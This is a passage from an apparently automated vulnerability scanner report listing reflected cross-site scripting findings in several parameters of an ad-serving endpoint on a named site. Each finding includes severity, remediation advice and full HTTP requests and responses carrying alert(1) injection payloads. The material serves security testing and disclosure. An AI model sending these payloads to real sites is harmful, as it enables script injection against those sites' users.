GET /serve?cb=766962455&sh_rid=adserver006:1924796&ms=1&aid=6010&cgid=1851&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=29&pp=2.25&tp=766962455&click=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJsiqERauBFPXSBmP9s2AE4NzfJNSZJLkr1MZys6yBuzkPYlO-WsL-u9Nyw_MesY85QJo7eqLkYedGgXtnLRYxzj4QDYLeEI_B9J5yAzws_ialUonMAAAA=%26dst=3faa3"><script>alert(1)</script>fde6f550ff2&ck= HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; ccc="OTA2OjE="; view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: ccc="OTA2OjM=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Wed, 27-Jun-2012 01:26:32 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 25-Jun-2021 01:26:32 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); v
...[SNIP]...
="http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJsiqERauBFPXSBmP9s2AE4NzfJNSZJLkr1MZys6yBuzkPYlO-WsL-u9Nyw_MesY85QJo7eqLkYedGgXtnLRYxzj4QDYLeEI_B9J5yAzws_ialUonMAAAA=&dst=3faa3"><script>alert(1)</script>fde6f550ff2http://delivery.steelhousemedia.com/click?sh_click=Y2I9NzY2OTYyNDU1IXNoX3JpZD1hZHNlcnZlcjAwNDoxOTI2NTE5IW1zPTEhYWlkPTYwMTAhY2dpZD0xODUxIWNpZD05MDYhZ3VpZD1kMDliNzU2NC1lMDZhLTQzOWYtODhmMS0yMzc1NGJjNjRiZW
...[SNIP]...

1.281. http://delivery.steelhousemedia.com/serve [eid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://delivery.steelhousemedia.com
Path:   /serve

Issue detail

The value of the eid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63f83"-alert(1)-"ee767d954 was submitted in the eid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve?cb=766962455&sh_rid=adserver006:1924796&ms=1&aid=6010&cgid=1851&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=2963f83"-alert(1)-"ee767d954&pp=2.25&tp=766962455&click=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJsiqERauBFPXSBmP9s2AE4NzfJNSZJLkr1MZys6yBuzkPYlO-WsL-u9Nyw_MesY85QJo7eqLkYedGgXtnLRYxzj4QDYLeEI_B9J5yAzws_ialUonMAAAA=%26dst=&ck= HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; ccc="OTA2OjE="; view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: ccc="OTA2OjM=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Wed, 27-Jun-2012 01:26:36 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MTA5JnZ0PTE=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 25-Jun-2021 01:26:36 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); var originalRequestURL = "delivery.steelhousemedia.com/serve?cb=766962455&sh_rid=adserver006:1924796&ms=1&aid=6010&cgid=1851&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=2963f83"-alert(1)-"ee767d954&pp=2.25&tp=766962455&click=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJsiqERauBFPXSBmP9s2AE4NzfJNSZJLkr1MZys6yBuzkPYlO-WsL-u9Nyw_MesY85QJo7eqLkYedGgXtnLRYxzj4QDYLeEI_B
...[SNIP]...

1.282. http://delivery.steelhousemedia.com/serve [guid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://delivery.steelhousemedia.com
Path:   /serve

Issue detail

The value of the guid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1af4d"-alert(1)-"2b815edc39d was submitted in the guid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve?cb=766962455&sh_rid=adserver006:1924796&ms=1&aid=6010&cgid=1851&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb1af4d"-alert(1)-"2b815edc39d&advid=9297&segid=0&eid=29&pp=2.25&tp=766962455&click=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJsiqERauBFPXSBmP9s2AE4NzfJNSZJLkr1MZys6yBuzkPYlO-WsL-u9Nyw_MesY85QJo7eqLkYedGgXtnLRYxzj4QDYLeEI_B9J5yAzws_ialUonMAAAA=%26dst=&ck= HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; ccc="OTA2OjE="; view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: guid=0c5f7ce9-1236-4810-b390-784b3f20facc;Path=/;Domain=.steelhousemedia.com;Expires=Sun, 16-Jul-2079 04:40:09 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ccc="OTA2OjM=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Wed, 27-Jun-2012 01:26:02 GMT;Max-Age=31536000
Set-Cookie: view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 25-Jun-2021 01:26:02 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); var originalRequestURL = "delivery.steelhousemedia.com/serve?cb=766962455&sh_rid=adserver006:1924796&ms=1&aid=6010&cgid=1851&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb1af4d"-alert(1)-"2b815edc39d&advid=9297&segid=0&eid=29&pp=2.25&tp=766962455&click=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJsiqERauBFPXSBmP9s2AE4NzfJNSZJLkr1MZys6yBuzkPYlO-WsL-u9Nyw_MesY85QJo7eq
...[SNIP]...

1.283. http://delivery.steelhousemedia.com/serve [ms parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://delivery.steelhousemedia.com
Path:   /serve

Issue detail

The value of the ms request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92f55"-alert(1)-"369452baf4 was submitted in the ms parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve?cb=766962455&sh_rid=adserver006:1924796&ms=192f55"-alert(1)-"369452baf4&aid=6010&cgid=1851&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=29&pp=2.25&tp=766962455&click=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJsiqERauBFPXSBmP9s2AE4NzfJNSZJLkr1MZys6yBuzkPYlO-WsL-u9Nyw_MesY85QJo7eqLkYedGgXtnLRYxzj4QDYLeEI_B9J5yAzws_ialUonMAAAA=%26dst=&ck= HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; ccc="OTA2OjE="; view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: ccc="OTA2OjM=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Wed, 27-Jun-2012 01:26:01 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 25-Jun-2021 01:26:01 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); var originalRequestURL = "delivery.steelhousemedia.com/serve?cb=766962455&sh_rid=adserver006:1924796&ms=192f55"-alert(1)-"369452baf4&aid=6010&cgid=1851&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=29&pp=2.25&tp=766962455&click=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJs
...[SNIP]...

1.284. http://delivery.steelhousemedia.com/serve [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://delivery.steelhousemedia.com
Path:   /serve

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84442"-alert(1)-"54e261f7602 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve?cb=766962455&sh_rid=adserver006:1924796&ms=1&aid=6010&cgid=1851&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=29&pp=2.25&tp=766962455&click=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJsiqERauBFPXSBmP9s2AE4NzfJNSZJLkr1MZys6yBuzkPYlO-WsL-u9Nyw_MesY85QJo7eqLkYedGgXtnLRYxzj4QDYLeEI_B9J5yAzws_ialUonMAAAA=%26dst=&ck=&84442"-alert(1)-"54e261f7602=1 HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; ccc="OTA2OjE="; view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: ccc="OTA2OjM=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Wed, 27-Jun-2012 01:26:05 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 25-Jun-2021 01:26:05 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); v
...[SNIP]...
//bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJsiqERauBFPXSBmP9s2AE4NzfJNSZJLkr1MZys6yBuzkPYlO-WsL-u9Nyw_MesY85QJo7eqLkYedGgXtnLRYxzj4QDYLeEI_B9J5yAzws_ialUonMAAAA=%26dst=&ck=&84442"-alert(1)-"54e261f7602=1"; var base_url = "http://rtb.steelhousemedia.com/capsNotify?aid=9297&cid=906&pp=2.25&guid=d09b7564-e06a-439f-88f1-23754bc64beb"; var secure_url = "https://rtb.steelhousemedia.com/capsNotify?aid=9297
...[SNIP]...

1.285. http://delivery.steelhousemedia.com/serve [pp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://delivery.steelhousemedia.com
Path:   /serve

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e61d7"-alert(1)-"7cb16570519 was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve?cb=766962455&sh_rid=adserver006:1924796&ms=1&aid=6010&cgid=1851&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=29&pp=2.25e61d7"-alert(1)-"7cb16570519&tp=766962455&click=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJsiqERauBFPXSBmP9s2AE4NzfJNSZJLkr1MZys6yBuzkPYlO-WsL-u9Nyw_MesY85QJo7eqLkYedGgXtnLRYxzj4QDYLeEI_B9J5yAzws_ialUonMAAAA=%26dst=&ck= HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; ccc="OTA2OjE="; view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: ccc="OTA2OjM=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Wed, 27-Jun-2012 01:26:27 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 25-Jun-2021 01:26:27 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); v
...[SNIP]...
